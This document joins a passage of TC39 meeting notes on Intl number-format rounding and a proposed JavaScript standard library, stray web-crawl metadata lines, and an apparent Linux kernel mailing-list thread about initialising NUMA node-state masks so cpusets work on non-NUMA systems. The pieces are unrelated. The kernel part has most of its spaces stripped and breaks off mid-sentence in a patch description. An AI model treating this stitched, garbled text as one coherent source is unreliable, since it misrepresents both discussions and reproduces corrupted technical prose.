unit, not all browsers will support all units, but we will list a minimum set of units. Browsers can
JHD: If I pass a non-option name, what happens? i.e.
uni (missing the
t)
**SCR:**The options bag is handled internally by ignoring invalid option names.
JHD: Are the options using get (does it use the prototype)?
**SCR:**The way the properties are accessed is the same way the Intl spec already processes properties, for consistency.
WH: What about rounding behavior?
**SCR:**That's out of scope.
WH: What do you mean out-of-scope?
**SCR:**Designing a good rounding API is not an easy thing to do.
WH: It's kind of inherent for the compact notation you're proposing here. How can it not be in scope? In your rounding behavior issue you mention that 1230 in compact notation would be "1.2K". Multiply it by 10, you get "12K". Multiply it by 10 again, you get three significant digits: "123K". Multiplying by 10 again gets back to two significant digits: "1.2M".
**SCR:**It's a very good question and if you have ideas for how we should implement this in the spec, please let us know.
DE: This is great work in the proposal, although the spec text isn't complete on insertions, it's definitely sufficient for Stage 2.
**SCR:**Thank you, and I really appreciate all the great discussions in GitHub. So to WH, if you add more questions like that on GitHub, please do.
Conclusion/Resolution
- Stage 2 acceptance
JavaScript Standard Library
(Michael Saboff, MS)
MS: The amount of functionality part of the JavaScript standard library would likely grow over time and less module code would need to be downloaded. The standard library wouldn't be enabled by default—a programmer would just import this functionality and be able to use it. Hypothetically, suppose someone comes to TC39 asking for a new method to be added to the JS Core. Everything looks useful and we decide to move forward. They propose
Array.smooshed. Because we've polluted the namespace, we've made it very difficult to determine whether it's going to be a problem. Is there a way we can add extensibility safely? Imported objects are frozen and users extend via inheritance and wrapping. This is what I propose so we don't get "smooshed" again. (Reads slide about extending Statistics library). This raises a bunch of questions that are out of scope for this proposal, like what features go into standard library vs. core library, how do we stage new features, and how do we collaborate with Node.js and web standards bodies? Next steps are to describe polyfill fallback support.
JHD: I specifically want on my website to say this polyfill replaces any browser implementation of the Standard Library. This is useful to fix bugs in browsers. There's plenty of examples where code that's doing some built-in thing and the fact that the browser's supplying it, but doesn't work, and I should be able to deny access to the original versions.
MS: So how you do this today with some other module wanting to do some functionality is...
JHD: Yeah
MS: Can't that module/polyfill do something on the global object?
JHD: Yes, and I appreciate the danger that that code can change the world, but I'd like to create a function that nails down the implementations of the functions I care about then issues a callback when it's safe to use.
MS: That's a bigger problem than what this spec is trying to solve.
JHD: Most people don't bother to lock down, so I propose we do something that makes that more ergonomic.
DE: I think we can get this kind of polyfilling and tweaking with something based on Domenic's proposal. For fallbacks, use mixins. You could have a fallback listed in the Package Name Map. If you want to have a polyfill that fixes a bug in another implementation, rather than redirecting std:something to something else, and that something else is per-directory, it would open the original one and wrap the original one, or something like that. I'm glossing over a bunch of details, but I think we can work through that.
DD: Just to clarify, I know michael referenced the fallback syntax. The proposal as it's written right now lets you give a URL as a fallback. But if browsers don't implement the fallback syntax, then the fallback won't work, so it's on the chopping block. The most backwards-compatible way is different: domenic/package-name-maps/#referencing-host-supplied-packages-by-their-fallback-url .
YK: I see how that works, but you need a way to point back to the original one.
DD: I just wanted to clarify why this doesn't work.
YK: I said already, and I don't think soft fallback really solves the problem.
NHD: One of the things that we were exploring in this was
import Date from __bikeshed__, which would get you the original Date object; not necessarily the prototype equivalent, but something without tamperability. We're fully aware that this is a problem that needs to be fixed, and has a corollary with the getOriginals work.
JHD: My next topic was synchronous usage in scripts. I think it's a very different discussion that has come up on other proposals: should this feature work in scripts, or should it work in modules. At the moment, I believe import and export are the only things required for modules to work. I think the problem you're trying to solve exists in scripts and will exist in scripts for the foreseeable future.
WH: You're looking to advance but I don't know what the proposal is. You gave a slideshow, but there was no proposal.
MS: The proposal is that we add a standard library capability to JS.
WH: So what would the desired outcome be? Because it's very vague right now. The idea is vague, like saying we should add standard syntax. Is the goal when it reaches Stage 4 that you have specific libraries available in the standard library? Are you proposing a process to add such things? Are you proposing some specific language machinery here? It's just very vague; I see this as a good match for an effort to launch a group, but I don't know what the proposal here is.
MS: The proposal is to provide the mechanism for a standard library to be available. It's that simple. There are some examples of components that could be included, like Temporal, but that's not this particular proposal. I'm proposing the mechanism for putting standard functionality that is not available in your standard object to get the object into your namespace.
MS: Mechanism meaning standard functionality. When you import that functionality, you get it in your namespace and it's frozen.
WH: "Mechanism" is still very vague. It sounds like you're proposing modules. I'm confused because modules are already in the language.
MS: It's different from modules, since these are part of the standard itself.
BT: The module specifier in MS is something we need to decide on, as well as the capability to polyfill.
AK: I wanted to first address the procedural question for what this is. I wanted to point out that for stage 1, you don't have to have a lot of concrete stuff.
MS: And I purposely don't.
AK: Now, the freezing thing. It seems like if there's a version of Statistics, and they wanted to add another method to Statistics, that's tricky; they can't monkeypatch it, etc.
MS: They can import it under a different name.
AK: So if I'm writing a polyfill... there are some reasons the language has benefited... some of the experiences I've had working with Dart and working with a language that's very locked down is hard. It's hard to make all the implementations look the same. I'm not a fan of the freezing and I don't think it fixes the problem you're trying to solve.
YK: The polyfill problem comes up a lot, and fundamentally the problem seems to have a privileged way of running (i.e. first). We don't actually really have a privileged position to do that, however. But we'd like to allow that. Realms tries to allow that, with an initialization callback, but if we keep trying to solve this problem in an ad hoc fashion, we're not going to be satisfied. Any lockdown feature will come into conflict with that other problem. We need to decide what the mechanism for that is.
MS: I agree with what you're saying. I can see how the app wants to lock things down, but so do libraries and dependencies, and you run into the problem of orders and priorities and things like that. It's a difficult problem to solve, and I don't want to lock it to this.
YK: All I'm saying is the only person in the position to say that is the whole app.
KS: I think the reality is that (1) JS has an underdeveloped standard library. (2) People want to ship less code. (3) The fact we have the underdeveloped standard library is an opportunity. We can build on the experience of other standard libraries that are out there. It can be like Intl, where we come in and there's an awesome standard library feature being presented.
MS: I think adding functionality without incurring a syntax cost is a great other feature of this proposal.
DT: In response to YK, one of the things we did in response to the realms shim was that we need to provide direct support for shimming since this is a thing part of the JavaScript paradigm. Some direct mechanism to support shims and let them run first, and provide a realm.
BT: What does Stage 1 mean if the layered APIs proposal doesn't go through the stage process.
MS: They're not wedded together, but they're closely related.
DD: There's years of history with Node.js to support standard libraries, and now with Layered APIs, we very much support this work and intend to work together on this.
MS: We need to work with the web bodies to make sure we are in alignment.
BT: My concern is just that we're voting on Stage 1 for this thing but a lot of this is part of another proposal that doesn't intend to go through the stage process. We can help of course.
MS: I suspect that we should work in lockstep with Layered APIs.
DD: Concretely, I would view this as TC39 has no process for suggesting to Node.js things for standard libraries. But we are interested in putting things into standard libraries, and this proposal enables us to do this.
MS: So to be clear, I'm not saying that we conclude what's in the standard library. I'm not saying we can't do that, but it needs to happen and it needs to be in cooperation with Node.js.
DE: I'm a big fan of having this discussion and collaborating with the web and Node.js. But some open questions like, will TC39 export anonymous module records that hosting environments map to?
DD: Yeah. I generally agree. I think we've seen a lot of good convergence between Node and the browser, like in the global space: setTimeout, new URL, TextEncoder/TextDecoder. If TC39 wants to try to be a broker in those discussions, that makes sense. I think it would be a shame if we divide the namespace by standards body. If you make it "tc39:encodeURIComponent" but "whatwg:URL", that would be bad.
DH: I agree, but to add some nuance. There are APIs that are universal in value, but may be driven by people who are more accustomed to working in one body or another. There are certainly APIs that make some context on the web and not on Node.js, and the namespace may not make sense for all contexts.
DD: Well, C++ will put
web_view in
std::. (Laughs)
MS: I agree, you want some functionality, not some broad capability. We want something that's easy for people to remember.
**SCR:**In Android, for example the standard library will get implemented but then it will take years to make it into the actual platform and widespread enough to use. You end up with messy ways that you implement fallbacks and polyfills; for example, you need to pull in polyfill code for everyone, even browsers that support said feature, unless you have sophisticated fallback mechanisms. I think that a really important part of this discussion is how do we deal with this and make a transparent and standard way for dealing with these fallbacks/polyfills rather than dumping the fallback/polyfill problem into user land.
AK: This seems like a good segue to the TAG meetup.
WH: I object because we only have a slideshow at this point. I very much want a standard library, but it's not yet clear to me what we're signing up for for stage 1 here. If you can clarify what is and what isn't in scope, I will support it. Is the goal just to specify the mechanics of how people implement modules and how people use them? Is the goal to specify the modules themselves? Is the goal to set up liaisons with other organizations to define the modules?
MS: It's clear we're talking about the mechanics, right? Of how people use them and define them?
WH: Correct. Are we also trying to define the actual standard library modules?
MS: No, I am not saying definitively whether future proposals for standard library require the staging process. But to be clear the
Temporal module of the Standard Library is not part of this proposal. This is just concerned with the mechanics.
TST: Is it fair to say that you don't want to include any functionality here, but you also don't want to develop this in a vacuum, so it should go in tandem.
WH: Yes, it's fine to collaborate. Thank you for the clarifications. I withdraw my objection.
MS: It's something that we've needed for a long time; we need a way to offer a way to introduce a standard library.
TB: MPT said that we would need guidance. Temporal is a global feature, but if std were available, it would help that proposal.
Conclusion/Resolution
- Stage 1 acceptance
- JHD feedback for stage 2: address polyfill question, and sync usage in Scripts
|
https://esdiscuss.org/notes/2018-07-26
|
CC-MAIN-2019-18
|
refinedweb
| 9,263
| 72.97
|
Dynamic Languages and the Programmers that Love Them
The.
Unfortunately, there are a few problems with this approach – some obvious, some subtle.
But we do have working code now, so this is a good time to take a break. We’ll tackle some of these issues in the next installment. The current version of the source code can be downloaded from here.
Let!
To!
The only feedback I’ve gotten so far about the IronPython Profiler is that it would be nice not to have to specify a command-line option to use it. Imagine that you’ve got a REPL open and are in the middle of some interactive development – something at which I think Python excels. You’ve spent a fair amount of time setting up data and code, but now there’s something that’s running slowly that you’d like to analyze. Restarting your REPL means having to repeat all that setup work.
As a result of this feedback, we’ve added a new EnableProfiler method to the clr module. clr.EnableProfiler(True) will enable profiling, and clr.EnableProfiler(False) will disable it again.
Of course, IronPython is a compiler, and the calls to capture profiler data are compiled right into your code. You can’t just throw a switch to turn on profiling without actually forcing the code in question to be recompiled. This can be done by doing a reload() on the module that contains the code. Naturally, all the standard caveats for reload apply. In particular, any references to the old code from other modules and from instantiated objects don’t get automatically updated.
While making this change, it occurred to me that we could get function-level code coverage for free simply by looking for functions that had been compiled but not called at the end of a test run. This required a small change to the code that is run when you call clr.GetProfilerData(). Previously, this function only returned records for methods which had actually been called. This is how it continues to behave when no parameters are used. But when you call clr.GetProfilerData(True), you get all compiled methods – even those that were never used.
Armed with this change, here’s how I modified the test runner for a project I’m working on:
def _trySetupCoverage():
for i in xrange(1, len(sys.argv)):
arg = sys.argv[i]
if arg.startswith('--coverage='):
import clr
clr.EnableProfiler(True)
coverage_file = arg[11:]
del sys.argv[i]
return coverage_file
return None
def _tryFinishCoverage(coverage_file):
if coverage_file is None:
return
hits, misses = {}, {}
for p in clr.GetProfilerData(True):
# Assume no module name contains a colon
end = p.Name.find(':')
if end < 0 or not p.Name.startswith('module '):
continue
module = p.Name[7:end]
if p.Calls > 0:
hits[module] = hits.get(module, 0) + 1
else:
misses[module] = misses.get(module, 0) + 1
with open(coverage_file, 'w') as f:
modules = hits.keys()
modules.sort()
for mod in modules:
h = hits.get(mod, 0)
m = misses.get(mod, 0)
total = h + m
if total > 0:
# Write module, covered functions, total functions, percentage
# TODO: Log functions that lack coverage
f.write('%s\t%d\t%d\t%.1f\n' % (mod, h, total, 100.0 * h / total))
if __name__ == "__main__":
coverage = _trySetupCoverage()
RunAllTests(None, None, None)
_tryFinishCoverage(coverage)
sys.exit(len(FAILED_LIST))
This code could be trivially modified so that an exception is thrown if coverage drops below a certain percentage. If the tests were being run as part of a checkin gate, it would then prevent code from being added to source control unless it was at least superficially under test.
I call this “poor man’s code coverage” because it was cheaply obtained and is not very sophisticated. It won’t tell us anything, for instance, if a module has not been imported at all. Nonetheless, it’s a potentially useful addition to the box of tools that’s available for IronPython.
These changes were made after IronPython 2.6 Alpha 1 was released, so if you want to play with them you’ll need to grab a recent source drop – one not earlier than Change Set 49035.
As always, your feedback could influence any further development in this direction.
I.
Here’s a sample program profile.py that demonstrates the statistics we’re gathering by printing them on exit.
import atexit
import clr
from System.Threading import Thread
def delay(seconds):
Thread.CurrentThread.Join(1000 * seconds)
def print_profile():
for p in clr.GetProfilerData():
print '%s\t%d\t%d\t%d' % (p.Name, p.InclusiveTime, p.ExclusiveTime, p.Calls)
atexit.register(print_profile)
delay(1)
The profiler isn’t enabled by default, as it does have a small impact on performance. You need to opt into it by running IronPython with the flag “-X:EnableProfiler”. If you use this flag with the above code, you’ll get the following output:
These records are returned in the order that they were compiled, not the order that they were first called – except that methods which were never called are omitted entirely.
A record with the name “module site” means the top-level import of the site module.
Other records that start with the name “module” refer to Python code.
Records that start with “type” refer to .NET code that is called directly from IronPython.
Times are recorded in “Ticks”, which are increments of 100ns. That means that the 10077140 ticks spent in the Thread.Join method are actually 1.007714 second.
Here’s what this profiler doesn’t do a good job of recording: the time required to parse Python, compile it into expression trees, generate the IL and JIT the IL. Some of this is accounted for in the time it takes to import an external module, but not in a way that provides visibility to the constituent parts.
We’d love to get your feedback on this experimental addition to IronPython. Happy profiling!
I crashed Mads' C# Tech Chat at Tech Ed EMEA in Barcelona on the grounds that the dynamic world has monkey-patched C#. It was fun, and I had the opportunity to answer a few dynamic/DLR-related questions that Mads was probably more capable of handling than I was.
One question that I choked on was whether or not this new language feature could be used to enable multiple dispatch from within C#. My gut feeling was that the answer was “yes”, but I couldn’t quite justify the answer so I hedged and hemmed and hawed and didn’t provide anything remotely like a satisfactory answer for the guy asking the question.
But now that I’ve had the benefit of a good night’s rest, the answer is blindingly obvious: yes, and here’s the evidence in some C# 4 sample code:
public class A {
}
public class B : A {
public class C : B {
public class D {
public class E : D {
public class Test {
public void Multi(D d, A a) { System.Console.WriteLine("DA"); }
public void Multi(D d, B b) { System.Console.WriteLine("DB"); }
public void Multi(D d, C c) { System.Console.WriteLine("DC"); }
public void Multi(E e, A a) { System.Console.WriteLine("EA"); }
public void Multi(E e, B b) { System.Console.WriteLine("EB"); }
public void Multi(E e, C c) { System.Console.WriteLine("EC"); }
public static void Main() {
Test test = new Test();
A a = new A();
A b = new B();
A c = new C();
D d = new D();
D e = new E();
test.Multi(d, a);
test.Multi(e, b);
test.Multi(e, c);
test.Multi((dynamic)d, (dynamic)a);
test.Multi((dynamic)e, (dynamic)b);
test.Multi((dynamic)e, (dynamic)c);
}
This produces the output
DA
DA
DA
DA
EB
EC
Why does it work?
When you use dynamic, you’re telling the C# binder to ignore anything that it knows about the type at compile time and to instead determine dispatch based on the actual type at runtime. The statically-bound method calls, by contrast, performs a dispatch based solely on the declared type.
So there you have it – one more use for dynamic: painless implementation of multiple dispatch.
(Thanks to Lucian Wischik for pointing out a flaw with the original version of this post.)!
I.
Let's say you're working on a project such as IronPython or IronRuby that makes use of Reflection.Emit to generate code at runtime. You're probably used to seeing a stack trace in Visual Studio that looks something like this:
Visual Studio will do its best to prevent you from viewing any part of that [Lightweight Function]. It won't let you trace into those methods, even while viewing from assembly language. If you're feeling clever, you can use the registers view and the and memory view to identify the return address on the stack, but there's no way of knowing for sure whether or not the caller is actual code or just a thunk of some kind.
But it turns out that there's another way of doing this that's fairly straightforward.
The managed debugger operates at a fairly high level of abstraction (as far as debuggers go). So when the going gets tough, the tough resort to windbg.exe (or its command-line cousin cdb.exe). These are part of the Debugging Tools for Windows, which can be downloaded from.
Here's what you need to do.
1. If you're not viewing it in Visual Studio already, bring up the Debug Location toolbar, which looks like this:
This will tell us the name and id of the process and thread that we need to connect to from windbg.
2. If you haven't already, start windbg. From the File menu, select Attach to a Process -- or hit F6.
Here's the key part. When you select the process for connecting, you want to specify that it's a noninvasive attach:
In Windows, only a single process can connect to any given other process as the debugger. Visual Studio is already the registered debugger for this instance of IronPython, so windbg cannot establish the same relationship with it. What "Noninvasive" debugging does is to use SuspendThread to suspend all the threads in the target process and then use ReadProcessMemory to access its internals. At that point, it's not unlike debugging a core dump; you have the entire memory image to look at, but you can't actually set breakpoints or execute any code inside that process.
There's plenty of information about noninvasive debugging at various locations on the net.
For our needs -- looking at the MSIL and the native machine code for methods generated through Reflection.Emit -- this turns out to be good enough.
3. Now we'll want to load the SOS Debugging Extension. This actually ships with the .NET runtime now, so there should be nothing for you to load. Unfortunately, the ".loadby" windbg command doesn't seem to work when we do a noninvasive connect, so you'll have to type a full path in the command to load the extension. With a default installation of Windows, this will probably be
.load C:\Windows\Microsoft.NET\Framework\v2.0.50727\SOS.dll (for a 32-bit process), and.load C:\Windows\Microsoft.NET\Framework64\v2.0.50727\SOS.dll (for a 64-bit process).
4. Let's make sure that we're looking at the right thread. You can get a list of threads by using the "~" command, or you can choose "Processes and Threads" from the View menu. The thread identifiers here are expressed in hexadecimal, so you'll need to do a quick conversion from the "1440" in Visual Studio to 5a0. Here's the output from the "~" command.
0:000> ~. 0 Id: 1c04.15f8 Suspend: 1 Teb: 7ffdf000 Unfrozen 1 Id: 1c04.11e8 Suspend: 1 Teb: 7ffde000 Unfrozen 2 Id: 1c04.16cc Suspend: 1 Teb: 7ffdd000 Unfrozen 3 Id: 1c04.d08 Suspend: 1 Teb: 7ffdc000 Unfrozen 4 Id: 1c04.153c Suspend: 1 Teb: 7ffda000 Unfrozen 5 Id: 1c04.1478 Suspend: 1 Teb: 7ffd7000 Unfrozen 6 Id: 1c04.d14 Suspend: 1 Teb: 7ffd9000 Unfrozen 7 Id: 1c04.102c Suspend: 1 Teb: 7ffd6000 Unfrozen 8 Id: 1c04.ac0 Suspend: 1 Teb: 7ffd5000 Unfrozen 9 Id: 1c04.1118 Suspend: 1 Teb: 7ffd4000 Unfrozen 10 Id: 1c04.5a0 Suspend: 1 Teb: 7ffd3000 Unfrozen 11 Id: 1c04.13d8 Suspend: 1 Teb: 7ffd8000 Unfrozen
In this list, thread 10 matches the one where we hit the breakpoint in Visual Studio -- so we can switch to this thread from thread 0 by executing "~10 s". Alternatively, if you were viewing the "Processes and Threads" window, you could just double-click on the thread in question.
5. Now we're ready to look at the stack. Execute the command "!clrstack". The output should closely resemble the stack trace that you see in Visual Studio -- except now you'll see names for all of those "Lightweight Function" frames. You'll also get the stack pointer and instruction pointer for each frame. The result should look something like this:
0:010> !clrstackOS Thread Id: 0x66c (10)ESP EIP 0572da10 04f85469 IronPython.Modules.PythonNT.chdir(System.String)0572da80 04a81b99 DynamicClass._stub_$11##11(System.Runtime.CompilerServices.Closure, System.Scripting.Actions.CallSite, System.Scripting.Runtime.CodeContext, System.Object, System.String)0572dab8 04a81ab1 DynamicClass._stub_MatchCaller(System.Object, System.Scripting.Actions.CallSite, System.Object[])0572dae4 047fa24d System.Scripting.Actions.CallSite`1[[System.__Canon, mscorlib]].UpdateAndExecute(System.Object[])0572dc68 04f60307 System.Scripting.Actions.UpdateDelegates.Update3[[System.__Canon, mscorlib],[System.__Canon, mscorlib],[System.__Canon, mscorlib],[System.__Canon, mscorlib],[System.__Canon, mscorlib]](System.Scripting.Actions.CallSite, System.__Canon, System.__Canon, System.__Canon)0572dce8 04a81925 DynamicClass.<module>$10##10(System.Runtime.CompilerServices.Closure, System.Scripting.Runtime.Scope, System.Scripting.Runtime.LanguageContext)0572dd88 04a74ab8 System.Scripting.ScriptCode.InvokeTarget(System.Linq.Expressions.LambdaExpression, System.Scripting.Runtime.Scope)
6. That second-from-top entry looks intriguing. How can we see its code? The first thing we need to do is to get a method descriptor for it, which we can do using the SOS command !ipmd.
0:010> !ip2md 04a81b99MethodDesc: 047ee580Method Name: DynamicClass._stub_$11##11(System.Runtime.CompilerServices.Closure, System.Scripting.Actions.CallSite, System.Scripting.Runtime.CodeContext, System.Object, System.String)Class: 047ee2c0MethodTable: 047ee324mdToken: 06000000Module: 047e6b48IsJitted: yesCodeAddr: 04a81b18
With the method descriptor, the !dumpil command will show us the actual MSIL for this method.
0:010> !dumpil 047ee580This is dynamic IL. Exception info is not reported at this time.If a token is unresolved, run "!do <addr>" on the addr givenin parenthesis. You can also look at the token table yourself, byrunning "!DumpArray 01eb82ec".
If you want to see what the associated x86 or x64 machine code looks like, the "CodeAddr" value from the !ip2md command will give you the starting address of the JITted code. You can use this with the windbg "u" command (for "unassemble").
7. Once you're done, be sure to detach windbg from the program you're looking at; it's quite likely that Visual Studio will be hung until you do. That's because it will be waiting to get data back from the debug thread that was injected into the target process -- but windbg has suspended that thread on your behalf. "Detach Debuggee" is a menu choice on the "Debug" menu.
One of the interesting things that's possible with cdb.exe -- the command-line version of windbg.exe -- is to control it from a separate program. All of the functionality we used above is accessible through cdb. You can therefore write a program that starts a separate cdb process, piping commands to its standard input and reading -- and parsing -- the results from its standard output. You could even write a GUI that shows the stack of the target process, and when the user clicks on a frame it puts up the MSIL for that frame into one pane and the assembly code into another.
Write it using IronPython.
Regarding.
A stack overflow is not a recoverable exception under .NET. When your program runs out of stack space, the CLR will tear down your process without giving you the chance to do anything about it.
So, how many frames can you get onto the stack before the world blows up? Obviously, this depends both on the size of the stack and on the size of each individual frame, but we can get ballpark numbers by setting up a simple recursive test.
On my laptop, I ran the following program and found that a value of 61450 would reliably produce a stack overflow exception.
public class Program {
static int max;
static void Test(int i) {
if (i >= max) throw new ArgumentException("done");
Test(i + 1);
}
public static void Main(string[] args) {
max = Int32.Parse(args[0]);
try {
Test(0);
} catch (Exception) {
}
System.Console.WriteLine("Test succeeded");
}
}
Now, let's change this program just a little bit so that we rethrow the exception once per stack frame.
public class Program {
static int max;
static void Test(int i) {
try {
if (i >= max) throw new ArgumentException("done");
Test(i + 1);
} catch (Exception) {
throw;
}
}
public static void Main(string[] args) {
max = Int32.Parse(args[0]);
try {
Test(0);
} catch (Exception) {
}
System.Console.WriteLine("Test succeeded");
}
}
With this change, the number of stack frames I can create drops down to about 18900. What's responsible for the difference? When an exception is thrown under .NET, the stack isn't cleaned up until a catch handler finishes executing normally. In this code, that doesn't happen until the end of the handler in the main function is reached. When we enter that catch block, the stack still contains each of the 18900 frames that we got from calling the Test function recursively. It also contains some kind of data from each of the 18900 exceptions that were rethrown.
These tests were all performed on a 32-bit edition of Windows Vista. When I rerun the first test under a 64-bit operating system, I get a much smaller number of frames: 13673. By default, a pure MSIL application will run as a 64-bit process on a 64-bit operating system. This has definite implications for the stack. For one thing, the return address now occupies 8 bytes instead of four. The x64 calling convention also requires the caller to set aside 32 bytes of "shadow space" on the stack regardless of the actual number of bytes used. Finally, the stack must be kept 16-byte aligned. These variations add up quickly when you multiply by ten thousand frames.
Finally, when performing the second test under x64, the program dies after only 114 frames. This appears to be because each thrown exception in the 64-bit CLR takes nearly 8 KB of stack space. So the next time you read that it's a bad idea to rethrow exceptions, you'll have one more reason to agree with the sentiment.
As it turns out, plenty.
One of the differences between the CLR and the Python language is that a Python exception can be of any Python class, while the CLR basically requires that an exception be an instance of System.Exception or a class derived from it. Even if it didn't, we don't have a 1-to-1 mapping between Python classes and CLR classes, so we can't use the equivalent of "catch (PythonDefinedException pde) {}" in our emitted code. Instead, we throw a System.Exception with which we associate the thrown Python object. That means that every Python catch block defined by user code needs to "catch (Exception e)" and then look at the actually thrown object in the catch block. If its type does not match any except handlers, we have no choice but to rethrow.
In other words, consider the following code:
def inner(i):
try:
if i < 50: return inner(i + 1)
raise RuntimeError, 'Raised after fifty'
except TypeError:
return 0
try:
inner(0)
except:
print 'Caught'
When IronPython generates code for the except handler of the inner() function, it has to catch all exceptions and examine them for their type. In this sample, that will first happen on the fifty-first invocation of inner(). Because RuntimeError does not match the TypeError criterion, the exception will be rethrown -- and caught again on each of the 50 subsequent exception handlers it meets in the inner() function while unwinding the stack.
It gets better.
In order to be able to display a Python stack trace when an exception happens we wrap generated code in a fault handler. A fault handler is a feature of MSIL that's not currently available when programming in C# -- it's basically the equivalent of a finally block that only runs if the guarded block is exited via an exception. However, there's a catch (if you'll pardon the pun). The fine print in the MSDN documentation tells us that exception fault blocks aren't supported when emitting dynamic methods. As a result, when building a dynamic method, the DLR will replace a fault block with an ordinary catch block which will (say it with me) rethrow the exception.
This means that -- in the Python code snippet above -- we may end up with as many as 102 exception objects on the stack before it is finally unwound.
So far, we haven't gotten any reports of this issue causing trouble "in the wild". As such, I present it here largely as an intellectual curiosity and as a somewhat entertaining diversion. If you do run into this problem, please let us know by filing a bug at the IronPython website. It is always possible to force a .NET application to run as a 32-bit process under a 64-bit operating system, and that would be my suggestion for a temporary workaround.
May your cup run over, but your stack stay well below its limit line. Good night, and good luck.
|
http://blogs.msdn.com/curth/default.aspx
|
crawl-002
|
refinedweb
| 3,652
| 65.22
|
My project is on MVC 4. In it I can't access any of scripts
function like @Scripts.Render("~/bundles/modernizr") as Scripts is an
ambigious reference between 'System.Web.WebPages.Scripts' and
'System.Web.Optimization.Scripts'
I have following entries in
my webconfig :
<pages>
<namespaces> <add namespace="System.Web.Helpers"
My requirement is to invoke some processing from a Jenkins build server,
to determine whether the domain model has changed since the last build.
I've come to the conclusion that the way forward is to write a script that
will invoke a sequence of existing scripts from the db-migration plugin.
Then I can invoke it in the step that calls test-app and war.
I've looked in the Grails doc
Some sites have many scripts. For example orionhub.In such a case
Chrome's Developer Tools become a little bit confusing (See Picture).Is there a way to filter the shown scripts, for example by name?
edit: I found that when I am in the "Scripts" Context I
can start typing and the first script matching the word I typed so far will
be selected.
I've got a database change management workflow in place. It's based on
SQL scripts (so, it's not a managed code-based solution).
The
basic setup looks like this:
Initial/ Generate
Initial Schema.sql Generate Initial Required Data.sql
Generate Initial Test Data.sqlMigration
0001_MigrationScriptForChangeOne.sql 0002
In my ASP.NET MVC4 application's RegisterBundles method, I create the
following Script bundle:
bundles.Add(new
ScriptBundle("~/bundles/whatever")
.Include("~/Scripts/whatever1.js")
.Include("~/Scripts/Whatever/whatever2.js"));
So,
"whatever1.js" is directly under the Scripts folder, whilst "whatever2.js"
is in a subfolder under Scripts.
When I open Google Chrome's developer tools, I do not get the scripts
tab. I have done this on two computers, one running Windows 7 and the other
Windows Server 2008 R2. Can you please tell me what I need to do to get the
Scripts tab back. Many thanks!
Do the userdata scripts run before or after the ones set up to run on
every boot? Is there a way to change the priority?
I have a very strange problem.IE throws me error messages when I
try to use - JqueryUtilities as $. Cookie. Problem only occurs when I try
to access these functions from an external script. If I use these functions
in a script page itself they work.
Any idea?
I am pressmuming (without really knowing) that "gant" is superior to
"ant", especially when building grails applications. I have some old,
inherited, grails apps using ant. Is is possible or easy to convert
existing build.xml files into gant build scripts?
I have a script that streams files from a server and saves the data
gathered, small chunks at a time to prevent memory overflow, on the host
server.
Did I mention it is a PHP script?
This is
how it works
//loop while data exists on the clients server
side file.while (!feof($xml_fp)) { //grab
data in proportions of specified ch
|
http://bighow.org/tags/scripts/1
|
CC-MAIN-2017-39
|
refinedweb
| 511
| 68.16
|
On Wed, 2007-08-15 at 09:31 -0500, Serge E. Hallyn wrote:> Quoting Lee Schermerhorn (Lee.Schermerhorn@hp.com):> > On Tue, 2007-08-14 at 14:56 -0700, Christoph Lameter wrote:> > > On Tue, 14 Aug 2007, Lee Schermerhorn wrote:> > > > > > > > Ok then you did not have a NUMA system configured. So its okay for the > > > > > dummies to ignore the stuff. CONFIG_NODES_SHIFT is a constant and does not > > > > > change. The first bit is always set.> > > > > > > > The first bit [node 0] is only set for the N_ONLINE [and N_POSSIBLE]> > > > mask. We could add the static init for the other masks, but since> > > > non-numa platforms are going through the __build_all_zonelists, they> > > > might as well set the MEMORY bits explicitly. Or, maybe you'll> > > > disagree ;-).> > > > > > The bitmaps can be completely ignored if !NUMA.> > > > > > In the non NUMA case we define> > > > > > static inline int node_state(int node, enum node_states state)> > > {> > > return node == 0;> > > }> > > > > > So its always true for node 0. The "bit" is set.> > > > The issue is with the N_*_MEMORY masks. They don't get initialized> > properly because node_set_state() is a no-op if !NUMA. So, where we> > look for intersections with or where we AND with the N_*_MEMORY masks we> > get the empty set.> > > > > > > > We are trying to get cpusets to work with !NUMA?Sounds reasonable. > > > > > > Well, yes. In Serge's case, he's trying to use cpusets with !NUMA.> > He'll have to comment on the reasons for that. Looking at all of the> > So I can lock a container to a cpu on a non-numa machine.> > > #ifdefs and init/Kconfig, CPUSET does not depend on NUMA--only SMP and> > CONTAINERS [altho' methinks CPUSET should select CONTAINERS rather than> > depend on it...]. So, you can use cpusets to partition of cpus in> > non-NUMA configs.> > > > In the more general case, tho', I'm looking at all uses of the> > node_online_map and for_each_online_node, for instances where they> > should be replaced with one of the *_MEMORY masks. IMO, generic code> > that is compiled independent of any CONFIG option, like NUMA, should> > just work, independent of the config. Currently, as Serge has shown,> > this is not the case. So, I think we should fix the *_MEMORY maps to be> > correctly populated in both the NUMA and !NUMA cases. A couple of> > options:> > > > 1) just use node_set() when populating the masks,> > > > 2) initialize all masks to include at least cpu/node 0 in the !NUMA> > case.> > > > Serge chose #1 to fix his problem. I followed his lead to fix the other> > 2 places where node_set_state() was being used to initialize the NORMAL> > memory node mask and the CPU node mask. This will add a few unnecessary> > instructions to !NUMA configs, so we could change to #2.> > > > Thoughts?> > Paul, is the mems stuff in cpusets only really useful for NUMA cases?> (I think it is... but am not sure) If so I suppose one alternative> could be to just disable that when !NUMA. But disabling cpusets when> !NUMA is completely wrong.> > I personally would think that 1) is still the best option. Otherwise> the action> > echo $SOME_CPU > /cpusets/set1/cpu> echo $SOME_CPU > /cpusets/set1/mems> > works on a numa machine, and is wrong on a non-numa machine. With> option 1, the second part doesn't actually restrict the memory, but> at least /cpusets/set1/mems exists and $SOME_CPU doesn't have to be 0 to> be valid.Well, you really shouldn't be writing cpu ids to the cpuset mems file.Rather, it takes node ids. And on !NUMA configs, only node 0 exists.Can you actually write a !0 cpuid to the mems file with the currentoption #1 patch [that uses node_set() to populate the node_states[]]?It should allow something like: echo 0,1<and maybe others> >/cpusets/set1/memsAs long as one of the specified node ids has memory, it will silentlyignore any that don't.If you're up for it, you could try the following patch to staticallyinitialize the node state masks, in place of the "option 1" patch. Beaware, tho', that I've only tested on my ia64 NUMA platform. I didcompile it [page_alloc.c] without error under allnoconfig.Lee-----------------PATCH Initialize N_*_MEMORY and N_CPU masks for non-NUMA configAgainst: 2.6.23-rc2-mm2Statically initialize the N_*_MEMORY and N_CPU node state masksfor !NUMA configurations. This static initialization is requiredbecause the node_set_state() function becomes a no-op for !NUMA.Other generic code assumes that these masks are set correctly.Note that in NUMA configurations, these masks will be populatedcorrectly, so don't bother with static 